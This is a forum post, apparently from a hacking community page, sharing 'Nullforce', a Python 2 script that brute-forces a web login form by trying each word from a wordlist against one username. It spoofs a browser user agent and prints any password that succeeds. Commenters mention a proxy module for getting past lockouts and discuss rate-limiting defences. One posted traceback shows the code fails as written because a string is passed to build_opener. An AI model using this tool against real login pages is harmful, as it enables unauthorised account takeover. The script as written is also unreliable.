Nullforce: Web-Based Login Cracker

Nullforce: Web-Based Login Cracker

#!/usr/bin/env python2

#Name         : Nullforce - Nullforce.py
#Version      : v0.1
#Writer(s)    : #nullbytez irc.darchoods.net

import re, urllib, urllib2

#Global vars
host = ""##Login form action URL
usr = "" ##Username/email to hax
wl = "" ##File path to wordlist
badLogin ="" ##What the page source throws for bad logins, this can be a partial word
#Wordlist vars
words = open(wl, "r").readlines()
print "[+] Words loaded:", len(words)

for word in words:
    word = word.replace("\n","")##This will remove newlines.
    loginSequence = [##Mimics web form.
    ('username', usr),##Name field name. Change if something else.
    ('password', word)]##Password field name. Change if named something else.
    loginData = urllib.urlencode(loginSequence)##Encode the data using urllib.
    opener = urllib2.build_opener(host)##Create an opener from the "host" variable.
    opener.addheaders = [('User-agent', 'Mozilla/5.0')]##Add a user-agent so we look like a web browser.
    source = opener.open(host, loginData).read()##Get the source from the site using our form.
    if re.search(badLogin,source) == None:##If the source doesn't have badLogin var true, hacked.
        print "Successful Login:",usr, word

13 Responses

Of course this doesn't take into pages that lock after multiple failed logins..

Looks badass though. I like it!

Remember that proxy thing I made that one time...

Lmao, this is only a skin of what Sol Gates made this into xD. Did we ever finish the proxy module for ours? That's a project we should not leave unfinished.

At the risk of sounding like an idiot.. That's counted by IP not account/username?

While an inconvenience to the user.. would it not be more secure to count failed logins by account/username?

In some regards, yes. But some forms of account bruteforcing target all of the accounts at random, so an implementation of both IP and user login attempt tracking would be most secure.

Fair enough, more learning :)

Hm. Very weird. I keep getting - 

[+] Words loaded: 62

Traceback (most recent call last):

  File "forcer.py", line 24, in <module>

    opener = urllib2.build_opener(host)##Create an opener from the "host" variable.

  File "/usr/lib/python2.6/urllib2.py", line 477, in build_opener

    opener.add_handler(h)

  File "/usr/lib/python2.6/urllib2.py", line 311, in add_handler

    type(handler))

TypeError: expected BaseHandler instance, got <type 'str'>

Wierd, it may be a formatting error, because WonderHowTo doesn't support code tags or something similar. Try redoing the spacing? I may have an extra copy of this somewhere to post on GitHub or something.

Yeah I will play around with it some more. See if I can find out what's wrong.

Kind of sorry I missed the IRC session. =/

Haha, come to IRC now :D yes?

great!

Share Your Thoughts

  • Hot
  • Active